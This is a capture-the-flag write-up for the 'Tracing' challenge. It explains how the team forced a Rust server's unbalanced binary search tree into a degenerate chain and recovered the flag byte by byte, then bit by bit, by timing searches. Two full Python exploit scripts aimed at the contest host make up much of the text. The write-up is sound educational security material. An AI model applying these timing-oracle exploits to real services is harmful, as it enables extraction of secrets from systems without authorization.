Tracing

NOTE: Originally published on STT's website

TL;DR

  1. Create a degenerate BST (possible because the server's tree is not self-balancing)
  2. Learn part of the flag from how long the search on the BST takes

Solution

Looking at the provided files first, we saw that we had been given the source code and that it was written in Rust:

  • Cargo.toml - Build file, containing only the build options and dependencies
  • src/bst.rs - Binary Search Tree implementation
  • src/lib.rs - Defining only module bst.rs
  • src/bin/server.rs - The server, which manipulates a BST of UUIDs

We compiled it and ran it locally, and found that our request was only processed after pressing Ctrl-D, i.e. once the client signals the end of its input. The server is started with some arguments, which we assumed to be the flag; it converts them to UUIDs and stores them in a vector. Then it binds to port 1337 and waits for connections.

When it receives a request, it treats all input as a sequence of UUIDs, keeps only the valid ones, and builds a BST from them, with the first input as the tree's root. It sends back a response with the number of UUIDs received, searches the tree for the arguments it was started with (in debug mode it even prints whether they are in the tree), and then closes the connection.

The server can print some information to the console in debug mode. After a few tries and some research, we arrived at this command:

RUST_LOG=debug cargo run -- ctf{Th1s1s4Fl4g}

bst.rs is just a regular unbalanced Binary Search Tree implementation, which doesn't allow duplicate nodes.
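To make the consequence of "unbalanced" concrete, here is a minimal Python model of such a tree. It is only a sketch of the idea, not a port of bst.rs: the names Node, BST, insert and search are ours, and the only properties assumed from the challenge are that the tree never rebalances and that duplicates are rejected.

```python
class Node:
    def __init__(self, key):
        self.key = key
        self.left = None
        self.right = None


class BST:
    """Unbalanced binary search tree that ignores duplicate keys."""

    def __init__(self):
        self.root = None

    def insert(self, key):
        """Insert key; return False if it was already present."""
        if self.root is None:
            self.root = Node(key)
            return True
        node = self.root
        while True:
            if key == node.key:
                return False
            side = "left" if key < node.key else "right"
            child = getattr(node, side)
            if child is None:
                setattr(node, side, Node(key))
                return True
            node = child

    def search(self, key):
        """Return (found, number of nodes visited)."""
        node, visited = self.root, 0
        while node is not None:
            visited += 1
            if key == node.key:
                return True, visited
            node = node.left if key < node.key else node.right
        return False, visited


tree = BST()
for k in range(1000):  # sorted input: every node becomes a right child
    tree.insert(k)

# A key larger than everything in the tree walks the whole chain.
found, visited = tree.search(1000)
print(found, visited)
```

With sorted input the tree degenerates into a linked list, so a search costs as many steps as there are nodes instead of roughly log2(n).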

The first attempt

We tried to find a vulnerability in the source code (especially in server.rs), because this was a pwn challenge and there could be issues with the code. There was even a comment hinting at conflicts caused by using 2 crates that export a trait with the same name:

// Ugh, async_std::prelude::StreamExt doesn't have chunks(),
// but it conflicts with futures::stream::StreamExt for the methods it
// does have.

We looked up the docs of each crate and found that a method present in both was used in this program, but after a little research we concluded that this was not the way in: it didn't cause any issues.

A not wrong approach

After thinking a lot more, we thought it had to be related to the BST. Since the tree is unbalanced and the connection is only closed after checking whether the flag is in the tree, we could use a timing attack to find it.

The tree would have this structure:

          M
         / \
       ... ...
       /     \
      B       X
     /         \
    A           Y

The root of the tree (M) would be our guess; after it we send the branch with greater values (the one with X and Y) and then the branch with lower values (the one with A and B). To achieve this, we first limited the characters of our guess (using knowledge from our teammates who had already captured flags) to:

`0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-?!abcdefghijklmnopqrstuvwxyz_}`

Then, we assumed the flag had the format ctf{...} (because our teammates' flags were in this format), so our guess would start with ctf{. Since every entry had to be a valid UUID, i.e., 16 bytes long, we had to pad our guess, and to obtain the structure above the padding had to be precise. Here is the payload we came up with:

  • The guess:
    • ctf{&\xEF\xEF\xEF\xEF...}
    • & - the character currently being guessed
    • \xEF - the byte 0xEF, a value between the 0x00 and 0xFF padding of the two branches, so the guess sorts between them
  • The greater branch:
    • ctf{&\xFF\xFF\xFF\xFF...\x00\x00}
    • ctf{&\xFF\xFF\xFF\xFF...\x00\x01}
    • ...
    • & - the character currently being guessed
    • \xFF - the byte 0xFF, because it is the highest value a byte can take
    • The last 2 bytes before the } are increasing
  • The lower branch:
    • ctf{&\x00\x00\x00\x00...\x0F\xFF}
    • ctf{&\x00\x00\x00\x00...\x0F\xFE}
    • ...
    • & - the character currently being guessed
    • \x00 - the byte 0x00, because it is the lowest value a byte can take
    • The last 2 bytes before the } are decreasing

We settled on varying 2 bytes after some trial and error; this gave each branch 4096 nodes, which made the timing difference easier to see.
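As a rough sketch of how such a payload can be assembled, the snippet below builds the root guess followed by both branches and checks the resulting size. It mirrors what the exploit further down actually sends (no trailing } in the padded entries, and the uppercase CTF{ prefix used by the script); build_payload is a name made up for this illustration, and only the standard library is used instead of pwntools.

```python
import struct

LENGTH = 16  # bytes per UUID
N = 4096     # nodes per branch


def build_payload(prefix: bytes) -> bytes:
    """Root guess, then an ascending 'greater' chain, then a descending 'lower' chain."""
    pad = LENGTH - len(prefix)
    root = prefix + b"\xef" * pad
    # Ascending counters: each new node becomes the right child of the previous one.
    greater = [prefix + b"\xff" * (pad - 2) + struct.pack(">H", i) for i in range(N)]
    # Descending counters: each new node becomes the left child of the previous one.
    lower = [prefix + b"\x00" * (pad - 2) + struct.pack(">H", i) for i in reversed(range(N))]
    return root + b"".join(greater) + b"".join(lower)


payload = build_payload(b"CTF{A")
print(len(payload))  # (1 + 2 * 4096) * 16 = 131088 bytes per attempt
```

Each attempt therefore uploads about 128 KiB, which is one reason a larger N quickly becomes impractical.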

With this layout, if the guess for the current character is correct, the search for the flag in the BST ends quickly, because it only reaches the 2nd level. If the guess is wrong, the search takes much longer, because it has to walk the whole 4096-node chain on one side of the guess (the greater branch if we guessed below the correct character, the lower branch if we guessed above it).
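The effect can be reproduced offline by counting visited nodes instead of measuring time. The following is a small simulation under stated assumptions: keys are compared as raw 16-byte strings (lexicographically), the tree is a plain unbalanced BST, and N is reduced to 256 to keep it quick. The helpers insert, visited and tree_for are hypothetical names, and the secret is the flag quoted later in this writeup, written with the uppercase prefix the scripts use.

```python
import struct

LENGTH, N = 16, 256  # smaller N than the real exploit, to keep the demo quick


def insert(root, key):
    """Iteratively insert key into an unbalanced BST of [key, left, right] nodes."""
    if root is None:
        return [key, None, None]
    node = root
    while key != node[0]:  # duplicates are silently ignored
        side = 1 if key < node[0] else 2
        if node[side] is None:
            node[side] = [key, None, None]
            break
        node = node[side]
    return root


def visited(root, key):
    """Count the nodes touched while searching for key."""
    count, node = 0, root
    while node is not None:
        count += 1
        if key == node[0]:
            break
        node = node[1] if key < node[0] else node[2]
    return count


def tree_for(prefix):
    """Build the tree the server would build for one guess."""
    pad = LENGTH - len(prefix)
    keys = [prefix + b"\xef" * pad]
    keys += [prefix + b"\xff" * (pad - 2) + struct.pack(">H", i) for i in range(N)]
    keys += [prefix + b"\x00" * (pad - 2) + struct.pack(">H", i) for i in reversed(range(N))]
    root = None
    for k in keys:
        root = insert(root, k)
    return root


secret = b"CTF{1BitAtATime}"
for guess in (b"CTF{0", b"CTF{1", b"CTF{2"):
    print(guess, visited(tree_for(guess), secret))
```

In this model the correct prefix touches 2 nodes, while a guess that is one character too low or too high touches N + 1 nodes; the timing difference observed against the server comes from that gap.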

This is not a very good approach, since we had to try each character a few times to get more accurate timings, and only after going through the whole character set could we choose the character with the lowest search time. Since we were sitting right in front of our computers, we introduced a small optimisation: pressing Ctrl-C makes the script choose the character immediately and move on to the next position (we did this by catching the KeyboardInterrupt exception). Because there were two of us, I ran the exploit with the characters in the order shown above and my teammate, @RageKnify, ran it in reverse order. Each of us would then tell the other as soon as we got the next character (a correct guess was 3 orders of magnitude faster than a wrong guess).
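The "run it a few times and pick the fastest character" step boils down to a trimmed mean followed by a minimum. Below is a minimal sketch of that selection; trimmed_mean is our own helper name, and the timings are invented numbers used purely for illustration, not measurements from the challenge.

```python
def trimmed_mean(samples):
    """Drop the fastest and the slowest sample, then average the rest."""
    if len(samples) < 3:
        raise ValueError("need at least 3 samples to trim both ends")
    kept = sorted(samples)[1:-1]
    return sum(kept) / len(kept)


# Hypothetical timings in seconds (made up for this example).
timings = {
    "0": [1.21, 1.19, 1.25, 3.90, 1.20],
    "1": [0.002, 0.001, 0.450, 0.002, 0.002],
    "2": [1.18, 1.22, 1.20, 1.19, 0.60],
}

scores = {ch: trimmed_mean(samples) for ch, samples in timings.items()}
best = min(scores, key=scores.get)
print(best, scores[best])
```

Dropping the two extremes keeps a single network hiccup (such as the 0.450 s outlier above) from hiding the correct character.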

When we were halfway in our journey for the flag, my teammate guessed (correctly) the rest of the flag. We had ctf{1BitA and the flag was ctf{1BitAtATime}

Our exploit was:

#!/usr/bin/env python
from pwn import *
import time

host = 'tracing.2020.ctfcompetition.com'
port = 1337

context.log_level = 'WARN'

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    io = connect('127.0.0.1', port)
    return io

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-?!abcdefghijklmnopqrstuvwxyz_}"
flag = "CTF{"
times = {}

N = 4096
LENGTH = 16
RUNS = 5

def generate_greater(cur):
    """
    Generate N 16 byte sequences greater than cur
    """
    template = cur.encode() + b"\xff" * (LENGTH - len(cur) - 2)
    assert len(template) == LENGTH - 2

    ret = b""
    for i in range(N):
        ret += template + p16(i, endian="big")

    assert len(ret)%16 == 0
    return ret

def generate_lower(cur):
    """
    Generate N 16 byte sequences lower than cur
    """
    template = cur.encode() + b"\x00" * (LENGTH - len(cur) - 2)
    assert len(template) == LENGTH - 2

    ret = b""
    for i in range(N - 1, -1, -1):
        ret += template + p16(i, endian="big")

    assert len(ret)%16 == 0
    return ret

def run(cur):
    io = start()

    # Send guess
    io.send(cur.encode() + b"\xef" * (16 - len(cur)))  # send raw bytes, not a str

    # Send rest of the tree
    tmp = b""
    tmp += generate_greater(cur)
    tmp += generate_lower(cur)
    io.send(tmp)

    io.shutdown("send")

    # Get time to process input
    io.recv()
    tstart = time.time()
    io.recvall()
    tend = time.time()
    io.close()
    time.sleep(0.07)

    delta = tend - tstart
    return delta

while not flag.endswith("}"):
    for ch in chars:
        out = False
        cur = flag + ch

        res = []
        print("Current char: " + cur, end="\t")
        for _ in range(RUNS):
            delta = -1
            while delta == -1:
                try:
                    delta = run(cur)
                except KeyboardInterrupt:
                    out = True
                    break
                except Exception:  # connection hiccup: retry this run
                    delta = -1
            res.append(delta)
            if out:
                break

        if out:
            break

        res.sort()

        res = res[1:-1]
        avg = sum(res) / len(res)
        times[ch] = avg
        print(avg)

    minimals = []
    for _ in range(3):
        x = min(times, key=times.get)
        minimals.append((x, times[x]))
        times.pop(x)

    flag += minimals[0][0]

    # Just to get an idea of the difference
    print(minimals)
    print("------> Current Flag: " + flag + " <------")

print(flag)

He wasn't happy with this solution, because the flag says "1 bit at a time" and we had done it 1 byte at a time (hardcore boys xD).

While I was trying another challenge, he came up with a new solution (presented below) that works 1 bit at a time.

The intended solution

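This solution guesses bit by bit. Each guess sets a single extra bit, so the only question is whether the flag is greater than the guess or not; that is why it only generates one side of the unbalanced BST (the greater one).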
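The bit-by-bit idea can be checked offline by replacing the timing measurement with a node count. This is a sketch under assumptions, not the exploit itself: nodes_visited models a tree made of the guess plus a right chain of the next N integers, "slow" is approximated as visiting more than N // 2 nodes, and both function names are made up here. The secret is the flag quoted earlier, with the uppercase prefix the scripts use.

```python
N = 2048
N_BITS = 16 * 8


def nodes_visited(secret, root):
    """Search cost in a tree made of root plus the right chain root+1 .. root+N."""
    if secret < root:
        return 1  # the left subtree is empty, so the search stops at once
    return min(secret - root, N) + 1  # walk the chain until found or exhausted


def recover(secret, known_bits, stop_bit):
    """Recover bits known_bits .. stop_bit-1, most significant first."""
    shift = N_BITS - known_bits
    n = (secret >> shift) << shift  # start from the known prefix only
    for i in range(known_bits, stop_bit):
        if i % 8 == 0:
            continue  # the top bit of an ASCII byte is always 0
        candidate = n | (1 << (N_BITS - i - 1))
        if nodes_visited(secret, candidate) > N // 2:  # slow search: bit is set
            n = candidate
    return n


secret = int.from_bytes(b"CTF{1BitAtATime}", "big")
n = recover(secret, known_bits=4 * 8, stop_bit=14 * 8)
print(n.to_bytes(16, "big"))
```

Like the script that follows, the loop stops after 14 bytes. The last bytes of the flag keep the distance between flag and guess far larger than N, so a set bit always costs the full chain.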

#!/usr/bin/env python
from pwn import *
from Crypto.Util.number import *
import time

host = 'tracing.2020.ctfcompetition.com'
port = 1337

context.log_level = 'WARN'

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    io = connect('127.0.0.1', port)
    return io

def remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
    else:
        return remote(argv, *a, **kw)

N = 2048

def generate_greater(cur):
    ret = b""
    cur += 1
    for _ in range(N):
        ret += long_to_bytes(cur, 16)  # always emit full 16-byte blocks
        cur += 1
    return ret

def run(cur):
    io = start()

    guess = long_to_bytes(cur, 16)
    io.send(guess)

    right_side = generate_greater(cur)
    io.send(right_side)

    io.shutdown("send")

    # Get time to process input
    io.recv()
    tstart = time.time()
    io.recvall()
    tend = time.time()
    io.close()
    time.sleep(0.03)

    delta = tend - tstart
    return delta

def guess(cur):
    RUNS = 5
    res = []
    for _ in range(RUNS):
        delta = -1
        while delta == -1:
            try:
                delta = run(cur)
            except KeyboardInterrupt:
                exit()
            except Exception:  # connection hiccup: retry this run
                delta = -1
        res.append(delta)
    res.sort()
    res = res[1:-1]
    avg = sum(res) / len(res)
    print('avg:', avg)
    # 0.05 was chosen after some trial and error
    return avg > 0.05

N_BITS = 16*8

# { -> 01111011
known = b"CTF{"
flag = known + b"\x00"*(16-len(known))
n = bytes_to_long(flag)

i = len(known)*8

while i < 14*8:
    print(i)
    if i % 8 == 0:  # the top bit of an ASCII byte is always 0, so skip it
        i += 1
        continue
    # check if bit *i* should be active
    curr = n | 1 << (N_BITS - i - 1)

    if guess(curr):
        n = curr

    i += 1
    flag = long_to_bytes(n)
    print('flag:', flag)